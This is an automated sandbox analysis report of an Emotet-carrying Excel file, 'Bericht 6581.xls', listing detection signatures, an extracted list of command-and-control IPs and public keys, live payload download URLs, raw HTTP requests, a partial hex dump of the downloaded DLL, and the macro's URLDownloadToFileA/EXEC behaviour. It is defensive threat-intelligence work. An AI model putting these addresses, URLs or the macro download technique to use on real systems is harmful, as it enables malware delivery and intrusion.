Windows Analysis Report
Bericht 6581.xls

Overview

General Information

Sample Name: Bericht 6581.xls
Analysis ID: 667161
MD5: 349779ed9b68f3fc148e8d81a5fa1c2a
SHA1: b940cabd8846120f3c383edac2ee817f280552c5
SHA256: b8e39a80c58b7bfe21d4a9cc695128aa1b3066e3f85a2138fcacdc4fd96403a2
Tags: xls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Bericht 6581.xls Metadefender: Detection: 34% Perma Link
Source: Bericht 6581.xls ReversingLabs: Detection: 46%
Antivirus detection for URL or domain
Source: https://atperson.com/campusvirtual/EOgFGo17w/ Avira URL Cloud: Label: malware
Source: https://174.138.33.49:7080/$ Avira URL Cloud: Label: malware
Source: https://js.cofounderspecials.com/splash.js?v=1.1.1 Avira URL Cloud: Label: malware
Source: https://174.138.33.49:7080/( Avira URL Cloud: Label: malware
Source: http://atici.net/c/JDFDBMIz/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: atperson.com Virustotal: Detection: 12% Perma Link
Source: atici.net Virustotal: Detection: 13% Perma Link
Source: eliteturismo.com Virustotal: Detection: 11% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll Metadefender: Detection: 54% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll ReversingLabs: Detection: 88%
Source: C:\Users\user\soci4.ocx Metadefender: Detection: 54% Perma Link
Source: C:\Users\user\soci4.ocx ReversingLabs: Detection: 88%
Source: C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy) Metadefender: Detection: 54% Perma Link
Source: C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy) ReversingLabs: Detection: 88%
Source: 00000008.00000002.1764271448.000000000016A000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["174.138.33.49:7080", "188.165.79.151:443", "196.44.98.190:8080", "5.253.30.17:7080", "190.145.8.4:443", "54.37.228.122:443", "128.199.217.206:443", "175.126.176.79:8080", "104.248.225.227:8080", "54.37.106.167:8080", "198.199.70.22:8080", "139.59.80.108:8080", "103.85.95.4:8080", "165.232.185.110:8080", "103.224.241.74:8080", "178.62.112.199:8080", "178.238.225.252:8080", "62.171.178.147:8080", "202.134.4.210:7080", "103.71.99.57:8080", "103.41.204.169:8080", "139.196.72.155:8080", "188.225.32.231:4143", "87.106.97.83:7080", "37.44.244.177:8080", "64.227.55.231:8080", "93.104.209.107:8080", "103.56.149.105:8080", "43.129.209.178:443", "202.29.239.162:443", "210.57.209.142:8080", "83.229.80.93:8080", "85.25.120.45:8080", "190.107.19.179:443", "157.230.99.206:8080", "195.77.239.39:8080", "36.67.23.59:443", "104.244.79.94:443", "118.98.72.86:443", "37.187.114.15:8080", "46.101.98.60:8080", "85.214.67.203:8080", "165.22.254.236:8080", "157.245.111.0:8080", "128.199.242.164:8080", "202.28.34.99:8080", "88.217.172.165:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0Z74QVUQAAJA=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWXL4QVUQAAIg="]}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 51.38.169.114:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_00000001800427CC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_00000001800427CC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180042F88 FindFirstFileExW, 7_2_0000000180042F88
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180043464 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_0000000180043464
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0214C9F0 FindFirstFileW,FindNextFileW, 8_2_0214C9F0

Software Vulnerabilities
barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: I7IggNeBzEXeF5[1].dll.0.dr Jump to dropped file
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\8WkzZvRZPr2gVDdMW[1].dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: atperson.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 51.38.169.114:443
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 51.38.169.114:443

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 174.138.33.49 7080 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.22:49177 -> 174.138.33.49:7080
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 174.138.33.49:7080
Source: Malware configuration extractor IPs: 188.165.79.151:443
Source: Malware configuration extractor IPs: 196.44.98.190:8080
Source: Malware configuration extractor IPs: 5.253.30.17:7080
Source: Malware configuration extractor IPs: 190.145.8.4:443
Source: Malware configuration extractor IPs: 54.37.228.122:443
Source: Malware configuration extractor IPs: 128.199.217.206:443
Source: Malware configuration extractor IPs: 175.126.176.79:8080
Source: Malware configuration extractor IPs: 104.248.225.227:8080
Source: Malware configuration extractor IPs: 54.37.106.167:8080
Source: Malware configuration extractor IPs: 198.199.70.22:8080
Source: Malware configuration extractor IPs: 139.59.80.108:8080
Source: Malware configuration extractor IPs: 103.85.95.4:8080
Source: Malware configuration extractor IPs: 165.232.185.110:8080
Source: Malware configuration extractor IPs: 103.224.241.74:8080
Source: Malware configuration extractor IPs: 178.62.112.199:8080
Source: Malware configuration extractor IPs: 178.238.225.252:8080
Source: Malware configuration extractor IPs: 62.171.178.147:8080
Source: Malware configuration extractor IPs: 202.134.4.210:7080
Source: Malware configuration extractor IPs: 103.71.99.57:8080
Source: Malware configuration extractor IPs: 103.41.204.169:8080
Source: Malware configuration extractor IPs: 139.196.72.155:8080
Source: Malware configuration extractor IPs: 188.225.32.231:4143
Source: Malware configuration extractor IPs: 87.106.97.83:7080
Source: Malware configuration extractor IPs: 37.44.244.177:8080
Source: Malware configuration extractor IPs: 64.227.55.231:8080
Source: Malware configuration extractor IPs: 93.104.209.107:8080
Source: Malware configuration extractor IPs: 103.56.149.105:8080
Source: Malware configuration extractor IPs: 43.129.209.178:443
Source: Malware configuration extractor IPs: 202.29.239.162:443
Source: Malware configuration extractor IPs: 210.57.209.142:8080
Source: Malware configuration extractor IPs: 83.229.80.93:8080
Source: Malware configuration extractor IPs: 85.25.120.45:8080
Source: Malware configuration extractor IPs: 190.107.19.179:443
Source: Malware configuration extractor IPs: 157.230.99.206:8080
Source: Malware configuration extractor IPs: 195.77.239.39:8080
Source: Malware configuration extractor IPs: 36.67.23.59:443
Source: Malware configuration extractor IPs: 104.244.79.94:443
Source: Malware configuration extractor IPs: 118.98.72.86:443
Source: Malware configuration extractor IPs: 37.187.114.15:8080
Source: Malware configuration extractor IPs: 46.101.98.60:8080
Source: Malware configuration extractor IPs: 85.214.67.203:8080
Source: Malware configuration extractor IPs: 165.22.254.236:8080
Source: Malware configuration extractor IPs: 157.245.111.0:8080
Source: Malware configuration extractor IPs: 128.199.242.164:8080
Source: Malware configuration extractor IPs: 202.28.34.99:8080
Source: Malware configuration extractor IPs: 88.217.172.165:8080
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 157.230.99.206 157.230.99.206
Source: Joe Sandbox View IP Address: 188.165.79.151 188.165.79.151
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 17 Jul 2022 11:13:34 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Sun, 17 Jul 2022 11:13:34 GMTContent-Disposition: attachment; filename="I7IggNeBzEXeF5.dll"Content-Transfer-Encoding: binarySet-Cookie: 62d3eede6f19e=1658056414; expires=Sun, 17-Jul-2022 11:14:34 GMT; Max-Age=60; path=/X-Content-Type-Options: nosniffUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Sun, 17 Jul 2022 11:13:34 GMTContent-Length: 850944Keep-Alive: timeout=5, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e0 fc 1a 64 a4 9d 74 37 a4 9d 74 37 a4 9d 74 37 77 ef 77 36 a2 9d 74 37 77 ef 71 36 21 9d 74 37 77 ef 70 36 ae 9d 74 37 f6 e8 71 36 87 9d 74 37 f6 e8 70 36 aa 9d 74 37 f6 e8 77 36 ad 9d 74 37 77 ef 75 36 ad 9d 74 37 a4 9d 75 37 c7 9d 74 37 65 e8 71 36 a6 9d 74 37 65 e8 74 36 a5 9d 74 37 65 e8 8b 37 a5 9d 74 37 a4 9d e3 37 a6 9d 74 37 65 e8 76 36 a5 9d 74 37 52 69 63 68 a4 9d 74 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 29 76 cc 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 1d 00 b6 05 00 00 5c 07 00 00 00 00 00 54 2c 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 0d 00 00 04 00 00 00 00 00 00 02 00 20 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 ee 06 00 14 04 00 00 c4 f2 06 00 64 00 00 00 00 90 07 00 20 b0 05 00 00 30 07 00 38 46 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 0c 08 00 00 c0 87 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 87 06 00 38 01 00 00 00 00 00 00 00 00 00 00 00 d0 05 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 b4 05 00 00 10 00 00 00 b6 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ae 2d 01 00 00 d0 05 00 00 2e 01 00 00 ba 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 27 00 00 00 00 07 00 00 0e 00 00 00 e8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 38 46 00 00 00 30 07 00 00 48 00 00 00 f6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 80 07 00 00 02 00 00 00 3e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 20 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$dt7t7t7ww6
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /campusvirtual/EOgFGo17w/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: atperson.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /c/JDFDBMIz/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: atici.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /libraries/nbnH9dpd/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: domesticuif.co.zaConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 174.138.33.49:7080
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 20
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 17 Jul 2022 11:09:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://atperson.com/wp-json/>; rel="https://api.w.org/"Vary: User-AgentConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: unknown TCP traffic detected without corresponding DNS query: 174.138.33.49
Source: unknown TCP traffic detected without corresponding DNS query: 174.138.33.49
Source: unknown TCP traffic detected without corresponding DNS query: 174.138.33.49
Source: unknown TCP traffic detected without corresponding DNS query: 174.138.33.49
Source: unknown TCP traffic detected without corresponding DNS query: 174.138.33.49
Source: unknown TCP traffic detected without corresponding DNS query: 174.138.33.49
Source: unknown TCP traffic detected without corresponding DNS query: 174.138.33.49
Source: unknown TCP traffic detected without corresponding DNS query: 174.138.33.49
Source: unknown TCP traffic detected without corresponding DNS query: 174.138.33.49
Source: unknown TCP traffic detected without corresponding DNS query: 174.138.33.49
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000008.00000002.1764380077.0000000000205000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1561207698.0000000000205000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enU
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://174.138.33.49/
Source: regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://174.138.33.49:7080/$
Source: regsvr32.exe, 00000008.00000002.1764623608.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://174.138.33.49:7080/(
Source: 8WkzZvRZPr2gVDdMW[1].dll.0.dr, soci3.ocx.0.dr String found in binary or memory: https://js.cofounderspecials.com/splash.js?v=1.1.1
Source: regsvr32.exe, 00000008.00000002.1764652906.0000000002F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\8WkzZvRZPr2gVDdMW[1].dll Jump to behavior
Source: unknown DNS traffic detected: queries for: atperson.com
Source: global traffic HTTP traffic detected: GET /campusvirtual/EOgFGo17w/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: atperson.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /c/JDFDBMIz/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: atici.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /libraries/nbnH9dpd/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: domesticuif.co.zaConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 51.38.169.114:443 -> 192.168.2.22:49171 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 7.2.regsvr32.exe.1f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2020000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.1f40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2020000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1764450272.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1494028683.0000000001F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1764515187.0000000002131000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1494505422.0000000002141000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
Found malicious Excel 4.0 Macro
Source: Bericht 6581.xls Macro extractor: Sheet: Sheet7 contains: URLDownloadToFileA
Source: Bericht 6581.xls Macro extractor: Sheet: Sheet7 contains: URLDownloadToFileA
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\soci4.ocx Jump to dropped file
Found Excel 4.0 Macro with suspicious formulas
Source: Bericht 6581.xls Initial sample: EXEC
Source: Bericht 6581.xls Initial sample: EXEC
Yara signature match
Source: Bericht 6581.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\Bericht 6581.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Creates files inside the system directory
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\NfgWijQQRQpENoq\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001A098 7_2_000000018001A098
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018003E0D0 7_2_000000018003E0D0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800180E0 7_2_00000001800180E0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001C0F4 7_2_000000018001C0F4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001E134 7_2_000000018001E134
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002C150 7_2_000000018002C150
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001A1A0 7_2_000000018001A1A0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018004E1C0 7_2_000000018004E1C0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800181E4 7_2_00000001800181E4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180026288 7_2_0000000180026288
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001A2A8 7_2_000000018001A2A8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800182E8 7_2_00000001800182E8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001E320 7_2_000000018001E320
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001C324 7_2_000000018001C324
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180058338 7_2_0000000180058338
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001A3B4 7_2_000000018001A3B4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800063E0 7_2_00000001800063E0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00000001800183F0 7_2_00000001800183F0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002E420 7_2_000000018002E420
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001E508 7_2_000000018001E508
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018001C510 7_2_000000018001C510
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180028514 7_2_0000000180028514
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018002C51C 7_2_000000018002C51C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180018548 7_2_0000000180018548
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018005A5A4 7_2_000000018005A5A4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180026618 7_2_0000000180026618
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180018650 7_2_0000000180018650
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180028668 7_2_0000000180028668
